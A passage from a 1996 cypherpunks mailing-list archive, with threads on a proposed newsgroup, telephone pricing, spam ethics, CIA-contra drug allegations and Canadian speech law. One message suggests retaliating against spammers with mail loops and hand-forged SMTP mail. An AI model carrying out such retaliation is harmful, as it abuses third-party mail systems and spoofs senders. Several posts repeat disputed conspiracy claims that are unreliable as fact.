EfXEbX2267jOjgMMlKaA6/f9crjCmBd/1z2PwwTZ35E2oNvOAQzRxN9G6gd0jgao
AJK5z8rIvEU=
=8YC6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 22 Aug 1996 01:06:23 +0800
To: qut@netcom.com
Subject: Re: PreRFD: comp.org.cypherpunks
Message-ID: <9608211346.AA21049@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



No and HELL no.

I find that this list gets enough crap as it is, and gatewaying it to
a generally available Usenet group would just add to the noise level.

Now, if you want to gateway it to a local group because you
like your newsreader better than your email reader, 
be my guest.

Dan

> Subject: PreRFD: comp.org.cypherpunks
> 
> The Subject: line says it all.
> 
> My suggestion number #1:
> 
> No moderation.
> 
> 
> --
> Skip, OBC
> 

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Thu, 22 Aug 1996 03:21:56 +0800
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: PreRFD: comp.org.cypherpunks
In-Reply-To: <9608211346.AA21049@spirit.aud.alcatel.com>
Message-ID: <199608211550.IAA22958@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! No and HELL no.
! 
! I find that this list gets enough crap as it is, and gatewaying it to
! a generally available Usenet group would just add to the noise level.
! 
! Now, if you want to gateway it to a local group because you

I've never mentioned gatewaying, I'm only for that with moderated 
mailing lists, unlike cypherpunks .

! like your newsreader better than your email reader, 
! be my guest.

Not personally relevent, my favorite newsreader can be used for e-mail, but 
it's clumsy for that function.

! > Subject: PreRFD: comp.org.cypherpunks
! > 
! > The Subject: line says it all.
! > 
! > My suggestion number one:
! > 
! > No moderation.

My suggestion number two:

No gateway.  The list and newsgroup stays seperated.


--
Skip, OBC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Thu, 22 Aug 1996 06:42:37 +0800
To: cypherpunks@toad.com
Subject: Re: telco's vs x-phones
Message-ID: <199608211619.JAA10587@well.com>
MIME-Version: 1.0
Content-Type: text/plain




In a reply to Vipul Ved Prakash, Jim Bell wrote:

>Assume 30 cents per meter per fiber for cabled fiber, or about $10
(US) per meter for 36-fiber cable. 

Siecore plain vanilla 36 fiber singlemode list $ 1.82 a foot, $5.46
a yard

>Each fiber pair should be able to handle approximately 1 million
>conversations at current data rates, or a total of 18 million
>conversations for that 18-pair cable, or 9.5 trillion 
>conversation-minutes.

At current data rates (OC-48 Sonet) 32,256 voice channels per
fiber, 580,608 total for the fiber.

Off by a factor of roughly 36 at this point.

>Multiply this cost by 10 for right of way, trenching, repeaters,
>and other auxiliary hardware, or $100 per meter.  This is probably
>just a ballpark estimate, but...

Off by a factor of at least 10 not counting switching equipment.


>I've read that estimates show that it would probably be cheaper to
>provide cellular-telephone service in China to everyone than to
>wire the country up with copper lines.  This isn't particularly
>surprising.  Cell-phones solve the "last few hundred yards/mile or
>two" problem quite well.  Since nearly all of the actual
>connections in a copperline telephone system are 
>switch-to-individual-phone lines, going cellular saves a bundle of
>installation costs.

A good point, in Sri Lanka they were having problems with copper
bandits cutting down all the cable, till they switched to fiber.
The question is can the average citizen of china afford a cell
phone and service for what it can be installed.
 

In a reply to me Jim bell wrote:

>The long distance companies are not "using local networks," your
>customers are...to connect to those long distance companies.  And
>any payments LD companies make to you are, indeed, a subsidy.  
>Tell me, how much is this _subsidy_, exactly?

Who's using who is a matter of perspective. 

Q) if you call a dog's tail a "leg" how many legs does a dog have?

A) four, calling a tail a leg doesn't make it one.

Point? The LD companies pay to use the RBOC's networks, calling it
a subsidy doesn't make it one, except maybe to you. If they don't
like it, they are free (or soon will be) to build their own, or use
someone elses.

>As an alternative, the phone company would presumably be entitled
>to be served by phone lines, at say $30 per month or so, through
>which their customers reach them.  $30 per month is $1 per day or
>4 cents per hour or about 0.07 cents per minute.   3 cents doesn't
>equal 0.07 cents, now does it?!?

"Presumably be entitled?" The RBOC's currently charge what
regulations allow, if the regs go away, they will charge what the
market will pay.

>Tell me again how "the local/long distance subsidy was eliminated
>at breakup."  Tell me another one, daddy...

Enhance your calm Jim......

>How has this remaining SUBSIDY dropped over time, assuming it has? 
>When is it scheduled to drop to zero?

The rate has gone down since the regs are changing and competition
is increasing. I would be interested in hearing why you think it
will ever drop to zero.

>First, you need to figure out how to supply ISDN for a REASONABLE
>charge, like "no extra charge!" to customers.  It's been over 16
>years after I first heard of ISDN.  At the time, it seemed like a
>wonderful idea...against the 300 baud modems then in use.  Against
>modern 31K modems that you only have to pay for...ONCE...ISDN
>seems mighty lame.

>Face it, ISDN used to be a good idea.  But it's just barely shown
>up the moment it's hit the end of its marketing window.  ISDN will
>have a marketing lifetime for maybe a couple of more years, and
>only then because you can't put more bits through a 3.4 khz
>passband.

>Not to mention all the bullshit propaganda that claimed that with
>ISDN, you wouldn't have to buy any modems.  Well, maybe that's
>just because they didn't CALL them modems, but they charged way
>more for an essentially indistinguishable function.  Can you say,
>"Fraud"?  I knew you could!

 <sigh> Jim, first you set up the ISDN "Strawman" and then you
knock it down. I no more believe that ISDN is the future than you
do.

Be well!

Brian

"Zazen? Well it beats sitting around on your ass all day doing
nothing."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Thu, 22 Aug 1996 06:34:05 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <Pine.GUL.3.95.960821021046.14190C-100000@Networking.Stanford.EDU>
Message-ID: <Pine.3.89.9608210933.A27331-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Rich Graves wrote:

> On Tue, 20 Aug 1996, Z.B. wrote:
> 
> > Published in Washington, D.C.   July 9, 1996
> > Insult to Clinton leads to 2 arrests
> > 
> > ------------------------------------------------------
> > By Ruth Larson
> > THE WASHINGTON TIMES
> > ------------------------------------------------------
> 
> I think you should try a more credible paper. Say, Scientology's Freedom
> Magazine, rather than the Moonies'. You are of course free to believe
> whatever you wish.
>
I posted this due to a request from another reader.  My beliefs did not 
have anything to do with the issue.  



---

Zach Babayco
zachb@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@avwashington.com>
Date: Thu, 22 Aug 1996 01:02:46 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.GUL.3.95.960820100659.8541A-100000@Networking.Stanford.EDU>
Message-ID: <v03007802ae40bddcb1b1@[207.79.65.35]>
MIME-Version: 1.0
Content-Type: text/plain


>>snip<<
>It also rained cocaine in Tennessee in the '80s,
>but the authorities never seemed to notice.  Ask the Knoxville
>_News-Sentinel_ how many stories it can find in its archives relating
>to planes loaded with cocaine crash-landing on remote airstrips,
>airdrops being found in citizens' yards, etc.  Then ask the DEA what it did
>about those events.
>

The DEA probably didn't do shit, if you were (are) paying  attention, the
DEA has had its hands tied by the state department and the CIA for years.
As they are now an arm of the FBI, they have been almost totally deballed.

 When Klaus Barbie and his mercenaries from Argentina overthrough the
Government of Bolivia back in '80, it was blessed by the CIA and the State
department, cause the Bolivians were defineatly going "left". Bolivia is
now and was at the time, a coca country, that is their principal export.
Nearly 1/2 of all our cocaine comes from there. It is transported through
the Honduras and Coloumbia, Both CIA "Friendly" countries. The biggest dope
exporters are always up to their necks in CIA and US state department.

 Pay attention. The DEA has attempted to deal with this, and many of their
operatives end up fired or dead, this is why so many of them resigned back
in the late 80's after DEA operative Enrique (Kiki) Camerara was tortured
to death by the Mexican Government. The State department had the white
house (Ronald) get the DEA to back off the investigation after they
implicated top government and military people in Mexico as being involved
in the torture.

 The DEA may not actually be the "Good" Guys, but there are some much worse
out there




>bd
>
>p.s. Donna Rice has lately been running point for a regulate-the-internet
>front group.  I wouldn't put anything past her.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip, OBC)
Date: Thu, 22 Aug 1996 06:12:49 +0800
To: ichudov@algebra.com
Subject: Re: PreRFD: comp.org.cypherpunks
In-Reply-To: <199608211517.KAA28365@manifold.algebra.com>
Message-ID: <199608211645.JAA06426@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! Jim McCoy wrote:
! > qut@netcom.com (Skip) writes:
! > > My suggestion number #1:
! > > No moderation.
! > 
! > Suggestion 1 on how to diminish the feeble S/N ratio on cypherpunks:
! > 
! >         make it a newsgroup
! > Suggestion 2:
! >         make it an unmoderated newsgroup
! 
! How about making it a robomoderated newsgroup with only one enforced
! rule, forbidding any crossposting?

If moderation, then why not moderator(s) who simply send out cancel 
messages to everthing that is crossposted?  Traditional moderated 
newsgroups are technically inferior because all posts go through netnews 
chokepoints and then depends on the moderator(s) who's inevitable 
position has been the irresponsible one of keeping the position long 
after they lose interest with the high volumes.  Even if their was such
a person, there is still are chokepoint problem which is stupid to  
engage in.

In any case, creation of comp.org.cypherpunks in no way means gatewaying 
or shutting down cypherpunks@toad.com .


--
Love, 
Skip, OBC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 22 Aug 1996 01:18:30 +0800
To: cypherpunks@toad.com
Subject: The grey lady puts on some boots and rides a horseman or two...
Message-ID: <v03007800ae40c206aeb1@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


I'm listening to the BBC's World Service at the moment, and they're doing a
feature on pedophiles on the internet, complete with much knashing of teeth
about encryption and anonymity, along with some lurid stuff about private
holding cells, and sexual tourism, and slavery. And Lions. And Tigers. And
Bears. Oh My.

They even had a quote from someone at Wired (a Brit, didn't catch the
name), who sounded like he was wringing his hands about unbreakable
encryption. Probably spliced out of a larger quote which had more sense in
it.

Be afraid, be very afraid. They're coming for your daughters. The BBC says so.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 22 Aug 1996 02:53:05 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: PreRFD: comp.org.cypherpunks
In-Reply-To: <v02140b02ae40769e9ebb@[204.179.131.38]>
Message-ID: <199608211517.KAA28365@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jim McCoy wrote:
> qut@netcom.com (Skip) writes:
> > My suggestion number #1:
> > No moderation.
> 
> Suggestion 1 on how to diminish the feeble S/N ratio on cypherpunks:
> 
>         make it a newsgroup
> Suggestion 2:
>         make it an unmoderated newsgroup

How about making it a robomoderated newsgroup with only one enforced
rule, forbidding any crossposting?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Thu, 22 Aug 1996 05:26:23 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <Pine.HPP.3.91.960821144412.10644C-100000@cor.sos.sll.se>
Message-ID: <199608211740.KAA22683@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Asgaard <asgaard@Cor.sos.sll.se> writes:
>In the meantime, before these technological fixes are easily implemented,
>what is the proper way to handle unwanted commercial mail?

>What if the spam says: 'Do only reply to this if you want
>further contact with us' etc?

Then you fix up the "Reply-to:" line to point back to them, helping them
debug their anti-loop procedures.  For extra credit use port 25 to create
the mail so that they can't easily ignore "Reply-to" and use the "From:"
line for their next salvo.

	Jim Gillogly
	Trewesday, 29 Wedmath S.R. 1996, 17:39




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James C. Sewell" <jims@MPGN.COM>
Date: Thu, 22 Aug 1996 05:35:24 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming
Message-ID: <2.2.32.19960821145232.006fe294@tansoft.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:09 PM 8/20/96 -0700, Rich Graves wrote:
>On Wed, 21 Aug 1996, Vipul Ved Prakash wrote:
>
>> I don't know if there has been much discussion on the ethics of spamming
>> here? Is spamming free speech? 
>
>Yes.

No.  I think we can all (most) agree that spam-email is like junk-snailmail.
In that case there are a few things to consider:

  1. Junkmail requires the SENDER to pay for it, not the recipient.
  2. Junkmail is under the full authority of the Postmaster.  If
     they do anything illegal they have an authority to which they
     must answer and may face criminal charges for.
  3. You can't legally stuff mailboxes by driving around the neighborhood.
     It is against the law for me to walk up to your mailbox and put 
     something in it.  Should the same be true of emailboxes?
  4. Junkmail is usually at a lower priority than "real" mail and 
     due to costs is usually easily identifiable.  Email isn't.

  And one relating to only email:

     I don't want to have to spend 10 minutes letting Eudora sort
     through my mailbox because my filter rules are so numerous and
     complex due to me trying to block spam.

  We must remember that the First Amendment does not allow us to say
any thing at any time via any medium we choose.  There are limits
to it, usually in the name of public safety and harassment.  There
should be similar limits in the Internet.
  I'm not saying we shouldn't let you tell others how get rich quick
but that you should not be allowed to mail to *@*.* just to tell the
world how great we are.

 Jim

Jim Sewell - jims@tansoft.com    Tantalus Incorporated - Key West, FL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 22 Aug 1996 05:19:44 +0800
To: "Erik E. Fair" (Time Keeper) <fair@cesium.clock.org>
Subject: Re: Securing Internet mail at the MTA level
In-Reply-To: <v02140b24ae3fa8d7849e@[17.255.9.110]>
Message-ID: <199608211506.LAA16055@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Erik E. Fair" writes:
> SSH, while a quite useful tool, is not the right long-term solution for
> transport layer security - IP security is.

Agreed. (After all, I'm one of the creators of the spec, so how
couldn't I agree :) However, SSH is a neat hack for today -- I use it
for connecting over the net to machines where I can't hack the
operating system but can drop SSH on. An SSH like interface (actually,
Berkeley r-command like interface) will still be needed into the
future, btw.

> It's also clear to me that for E-mail, you don't want transport level
> security for the system; you want "object" security, that is, digital
> signature and encryption of the mail message.

Yup. This is a frequently missed point. Link security and object
security have different uses at different times -- and people confuse
them way too often.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 22 Aug 1996 06:19:41 +0800
To: qut@netcom.com (Skip)
Subject: RE: Canada Imprisons People For Human Rights Activity
Message-ID: <9607218406.AA840654179@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


qut@netcom.com (Skip)
>... you support imprisoning and deporting people based purely on their 
political ideas, ... Re: Ernst Zndel and his years of imprisonment by a court 
for merely expressing his racist ideas, racist political ideas being 
strictly illegal in Canada...

Actually, he was charged with inciting hatred against a recognizable group but
was eventually freed on appeal. I think the problem was that the prosecution
could not find anyone who listened to Zundel and didn't already hate the same
groups. Hence, no incitement.

He is currently fighting to get his Canadian citizenship, (he is a German
citizen) while many other people are fighting to prevent this. Zundel believes
that returning to Germany would result in imprisonment.

It's nice to know that the people we imprison for their views are still willing
to go to court to become a Canadian citizen.

James

Nota: Quebec recently held a referendum on seperation from Canada. 
Just talk about secession of a state in the U.S., and you'll quickly see which
country makes political ideas illegal.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Thu, 22 Aug 1996 06:33:58 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Satelites?
Message-ID: <199608211911.MAA25592@well.com>
MIME-Version: 1.0
Content-Type: text/plain



There was a review of a book called "Micro Space Craft" by Rick
Fleeter in the Aug issue of WIRED.

My copy arrived an hour ago......

Chapter one:   Why are we here?
Chapter two:   Propulsion-or-how to get there?
Chapter three: Orbit Mechanics-or-What keeps these things up      
               anyway?
Chapter four:  Orbit Mechanics II: The Movie
Chapter five:  You Send Me: Orbit mechanics III
Chapter six:   Magnetic Attractions
Chapter seven: Everything you always wanted to know about radio,
               Part one: Shatter the myth of the digital Miracle?
Chapter eight: Everything you always wanted to know about radio
               Part two: Faster than a speeding bullet.
Chapter nine:  Everything you always wanted to know about radio
               Part three: What's up Doc?
Chapter ten:   Thermal Dynamics: Tough talk about temperature
               (A short virtually painless, and occasionally      
               philosophical look at spacecraft thermostatics and 
               thermodynamics.
Chapter eleven: You got an attitude buddy?: (A primer on small
                satelite stability and control.)
Chapter twelve: Memory systems for spacecraft-or-Memory-What is it 
                good for?
Chapter thirteen: Mechanisms: The nuts and bolts of small         
                  Satelites.
Chapter fourteen: Batteries not included.
Chapter fifteen: Bring'em up clean.
Chapter sixteen: Satelite clusters
Chapter seventeen: Where to look for historical underpinnings,term 
                   definitions, and revolutionary zeal turned up to 
                   11.
Chapter eighteen: Space history and a possible future.
   
"Dr Rick Fleeter is a founder and President of the small Satelite
and space transportation company AeroAstro, and the International
Small Satelite Organization (ISSO). He has been responsible for
development of over 20 miniature satelites ranging from 2.5 to 250
pounds and has been writing and publishing the "NEW SPACE"
(previously ISSO) newsletter bimonthly since 1987."

The Edge City Press
10912 Harpers Sq. Ct.
Reston, VA 22091
703.620.6650
FAX 703.716.5752 9-5 EDT

"I LIKE IT !!!"(****) YMMV

Brian

"Zazen? Well it beats sitting around on your ass all day doing
nothing."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 22 Aug 1996 08:28:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <ae3ff85d0b02100490f2@[205.199.118.202]>
Message-ID: <Pine.3.89.9608211152.A29889-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Aug 1996, Timothy C. May wrote:

> At 5:16 AM 8/21/96, Paul S. Penrod wrote:
> >On Tue, 20 Aug 1996, Ross Wright wrote:
> 
> >> Market Droids????  As a salesman I take offence at this slur.
> 
> Sales droids are subservient to market droids...sort of like R2D2, a sales
> droid, getting his marching orders from C3PO, a market droid.
> 
> 
> >As for spamming, I get enough of it via snail-mail, I don't want to see
> >it in my Inbox too. And, for the record, there are lots of people out
> >there who pay on the bulk charge, not by time. Sending advertising or
> >junk mail to these folks costs them money, maybe not much for the one
> >message you sent, but several thousand over a month of a quarter add up
> >to real money.
> >
> >There is a time and place for legitimate advertising. I am sure that
> >given time and impetus, a number of clear channel venues will open up to
> >allow precision marketing and sales to happen electronicly.
> >
> >At the moment, it's bad nettiquette...
> 
> The basic problem is that, unlike paper mail, it costs a sender essentially
> nothing to send nearly any size file to as many people as he wishes. This
> is the basic economic fact of the Net at this time. Until this eventually
> changes, spamming will be with us.
> 
> (I understand experts in the field of "spamming" have various names for
> various flavors: spam, velveeta, jerky, etc. I'll call them all "unwanted
> messages.")
> 
> The problem is one of economics and allocation of costs. Other industries
> have the same issues:
> 
> * fax machines: costs of paper are borne by receiver, leading to high bills
> when "junk faxes" are received (and hence some laws restricting such faxes)
> 
> * cellular phones: receiver of calls usually is charged air time. Thus,
> "junk calls" cost money.
> 
> (My physical mailbox probably gets about $1 a day of junk mail, in terms of
> postage paid. More, in terms of costs to print catalogs, fliers, freebies,
> etc. It takes me about 20 seconds, tops, to decide what to discard
> immediately and what to save, so at this point "their costs" > "my costs.")
> 
> In my view, attempting to legislate what is "junk" and what is not junk is
> misguided. (And I suspect it rarely works in halting junk mail.) Junk is in
> the eye of the beholder.
> 
> There are technological fixes which I would favor over attempts to ban
> unwanted messages.
> 
> --Tim May
> 

I agree about the technological fixes. When enough people figure out or 
are shown how to block unwanted messages, the economics of scale 
disappear real fast. Unfortunately, there will always be a ready supply 
of the unwitting, and government's reaction is to legislate rather than 
educate.

Practically, it would be better to allow and promote a technological 
outlet for all of this, as it will never go away, so long as the medium 
exists.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 22 Aug 1996 07:52:24 +0800
To: qut@netcom.com (Skip)
Subject: RE: Canada Imprisons People For Human Rights Activity
Message-ID: <2.2.32.19960821192836.00ecde40@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 PM 8/21/96 EST, jbugden@smtplink.alis.ca wrote:

>Nota: Quebec recently held a referendum on seperation from Canada. 
>Just talk about secession of a state in the U.S., and you'll quickly see which
>country makes political ideas illegal.

It did not seem to stop the secessionist movement in Alaska (at least when I
was there).  But then that was before the Feds started taking a more active
role in Alaskan politics...  (Especially with their involvement to get pot
recriminalized  back during the Reagan administration.)

You expect the state to allow challenges to its authority?  And lose its
omnipotent status?

"It takes a Village to raise a child." - Number 2


---
|  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com  "|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Thu, 22 Aug 1996 08:44:48 +0800
To: Jim Ray <liberty@gate.net>
Subject: Re: [NOISE]CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <199608211235.IAA30204@osceola.gate.net>
Message-ID: <Pine.GUL.3.95.960821115130.17847C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Jim Ray wrote:
> [I said] 
> > Oh, I don't think it's impossible or even unlikely that at least
> >  some of the
> > groups lumped together as "contras" were involved in drug
> >  smuggling, and I
> > think it's reasonable to have different views regarding how much
> >  money was
> > involved and who knew what when (my view is very little, and
> >  medium). 
> 
> Anyone who says "very little" money is involved in any aspect of 
> the cocaine importation trade definitely doesn't live in Miami.

The aspect of the cocaine trade in Miami that is tied up with a conspiracy
to kidnap the mascot of the Miami Dolphins involves "very little" money.
This is not to suggest that the cocaine importation trade as a whole
involves "very little" money.

The supposed Contra Connection -- which as originally made up was not
supposed to involve Miami, by the way, but primarily CA, LA, and TX --
involves "very little" money relative to the Contra budget, and even less
considering how little was supposed to have been passed on, and "very
little" money relative to the total drug trade.

> >What I
> > object to are conspiracy theories along the lines of: 
> > 
> > 1. The Reagan Administration used the Contras to smuggle crack
> >  to the US in
> >    a deliberate attempt at genocide against Black people. (I
> >  heard this a
> >    lot, though seldom in so many words, on KPFK in the mid-80's;
> >  the SJ Merc
> >    series certainly has this as a subtext.)
> 
> I never said that, and I object to calling something a "conspiracy 
> theory" just because it's politically inconvenient.

Me too. Only wacky conspiracy theories should be called wacky conspiracy
theories. No, you never suggested the above -- as I said, I heard it mostly
on KPFK, a far-left, "Black Nationalist"-friendly radio station in Los
Angeles associated with the Pacifica Foundation, in the mid-80's. It would
be rather difficult to confuse them with you. :-) I include this example to
indicate where the story originated.

> > 2. Clinton was a CIA agent involved in the Contra drug-smuggling
> >  CaBaL.
> 
> He was governor of Arkansas when Reagan was President of the United 
> States. Do the search I already gave you, and read the articles.
> mena /p cocaine

My academic advisor was Terry Karl, a rather sharp critic of the CIA and a
specialist on Central America. I spent a decade on Latin American policy
issues. I personally spoke with Mr. Calero at a (well-picketed) reception at
Stanford in 1989. I had classmates from Nicaragua. Speculative
rumor-mongering by Beltway journalists who can't even read Spanish doesn't
impress me.

> > > It is a major, bipartisan, Watergate-style but bigger 
> > > scandal, and the strange bedfellows in the media who were
> >  doing a 
> > > halfway decent job of covering it [The Wall Street Journal and
> > > "High Times" magazine(!)] have fallen strangely silent on the
> > > subject as the election approaches. Hmmmmm.
> > 
> > 4. Anything where vague unsupported asserions are thrown out,
> >  followed by
> >    a Hmmmmm (sorry).
> 
> OK, looks like I have to say it again, and remember this is NOT me, 
> it's those conspiracy theorists at CBS News, printed in that 
> radical purveyor of vague unsupported asserions...The Wall Street 
> Journal:
> 
> "The FAA, FBI, Customs, CIA, Justice, DEA and the IRS were
> all involved in Mena. They won't say how they were involved,
> but they will tell you there is nothing there." -- Bill Plante,
> CBS News Correspondent, &  Michael Singer, Producer, CBS News,
> New York. [In Tuesday, May 3, 1994's  Wall Street Journal
> letters to the editor section.] Look it up.

In other words, they deny it, so it must be true.

> I am not a journalist, but it sometimes seems I have a better 
> institutional memory than they do. This story was covered poorly, 
> even though there was/is plenty there, because of politics and 
> power masquerading as "national security." The story is there for 
> journalists who want to risk covering it, but the trail is getting 
> cold, and yes, some loons have latched onto it, due in part to the 
> vacuum in "legitimate" media coverage.

This is backwards. The loons on the left started the story. In 1986, the
press and academia investigated the story, and concluded there was really
nothing to it. Even Chomsky, who welcomes any opportunity to "prove"  a
world conspiracy against leftists, rejected it (this is the same guy who
bought the Allende assassination myth until shortly before Barricada and
Mistral retracted it). Ten years later, another set of loons is trying to
interest the press in a laundered story. A couple of CBS reporters were
trolled, briefly. 

> [This will be my final word on this subject in this forum.]
> <sound of Perry cheering>

Likewise.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 22 Aug 1996 07:57:31 +0800
To: William Knowles <erehwon@c2.net>
Subject: Re: [NOISE] Airport legal question
Message-ID: <199608211952.MAA00934@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:37 PM 8/20/96 -0700, William Knowles wrote:
>Lucky,
> 
>>I know that it is a violation of federal law to joke about explosives at 
>>the X-ray machine. Would an "I love Explosives" sticker on carry-on 
>>luggage violate any laws?
> 
>Dunno, But you might get a kick out this from The Chicago Reader that 
>published a list of the "bomb threats" made at O'Hare International 
>airport a few weeks back.
  

>7/23:  "I don't have a bomb in the bag."
>7/24:  "Well no, I left my pipe bomb at home."
>8/1:  "It's not as if we were Swedish and here to blow up the airport."


I wonder how they determined that the lines above were "bomb threats."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 22 Aug 1996 09:03:37 +0800
To: Brian D Williams <cypherpunks@toad.com
Subject: Re: telco's vs x-phones
Message-ID: <199608211952.MAA00938@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:19 AM 8/21/96 -0700, Brian D Williams wrote:
>
>
>In a reply to Vipul Ved Prakash, Jim Bell wrote:
>
>>Assume 30 cents per meter per fiber for cabled fiber, or about $10
>(US) per meter for 36-fiber cable. 
>
>Siecore plain vanilla 36 fiber singlemode list $ 1.82 a foot, $5.46
>a yard

In other words, it's a fact of 5+ cheaper than I thought...


>>Each fiber pair should be able to handle approximately 1 million
>>conversations at current data rates, or a total of 18 million
>>conversations for that 18-pair cable, or 9.5 trillion 
>>conversation-minutes.
>
>At current data rates (OC-48 Sonet) 32,256 voice channels per
>fiber, 580,608 total for the fiber.

Well, I think I blew a decimal point, there.  Even so, semi-leading edge 
systems do about twice as well...

>
>Off by a factor of roughly 36 at this point.

However, the errors partially cancel, so I'm actually off by a factor of 2.

>
>>Multiply this cost by 10 for right of way, trenching, repeaters,
>>and other auxiliary hardware, or $100 per meter.  This is probably
>>just a ballpark estimate, but...
>
>Off by a factor of at least 10 not counting switching equipment.

In which direction? 

BTW, keep in mind I'm considering long-haul LD links between cities and 
states, NOT the kind of trenching that requires digging up city streets most 
of the way.  I don't doubt that some portions of a coast-to-coast link are 
substantially more expensive than $100 per meter, but as a proportion of the 
total length they are very small.


>In a reply to me Jim bell wrote:
>
>>The long distance companies are not "using local networks," your
>>customers are...to connect to those long distance companies.  And
>>any payments LD companies make to you are, indeed, a subsidy.  
>>Tell me, how much is this _subsidy_, exactly?
>
>Who's using who is a matter of perspective. 

Which is why you're unwilling to call it a "subsidy."


>Q) if you call a dog's tail a "leg" how many legs does a dog have?
>
>A) four, calling a tail a leg doesn't make it one.
>
>Point? The LD companies pay to use the RBOC's networks, calling it
>a subsidy doesn't make it one, except maybe to you. If they don't
>like it, they are free (or soon will be) to build their own, or use
>someone elses.
>
>>As an alternative, the phone company would presumably be entitled
>>to be served by phone lines, at say $30 per month or so, through
>>which their customers reach them.  $30 per month is $1 per day or
>>4 cents per hour or about 0.07 cents per minute.   3 cents doesn't
>>equal 0.07 cents, now does it?!?
>
>"Presumably be entitled?" The RBOC's currently charge what
>regulations allow, if the regs go away, they will charge what the
>market will pay.

You're full of inconsistencies.  First, you stated that the local/LD 
subsidies "went away with the breakup" (paraphrased) yet NOW you're saying 
"RBOC's currently charge what regulations allow."    I suggest that if those 
regulations "allow" RBOC's to charge 3 cents per minute to LD companies, 
_that_is_the_subsidy_ that you claimed had "gone away."  It's obvious that 
you don't want to use the dirty word "subsidy," but that's exactly what this 
thing is!

You need to remember that unless a price is defined by negotiation in the 
free market, there remains a possibility that it contains an underlying 
subsidy.  Since the whole purpose of the the payment from the LD company to 
the local co was as a subsidy, unless that payment disappears there is 
always a question of whether the subsidy remains.  Apparently it does.

The most obvious alternative, one that doesn't contain an obvious subsidy is 
a "per line per month" pricing system, where the number of lines counted is 
the maximum number of simultaneous calls that can be made through a given LD 
company at one time.  (NOT the total number of customers that the LD company 
has.)


>>How has this remaining SUBSIDY dropped over time, assuming it has? 
>>When is it scheduled to drop to zero?
>
>The rate has gone down since the regs are changing and competition
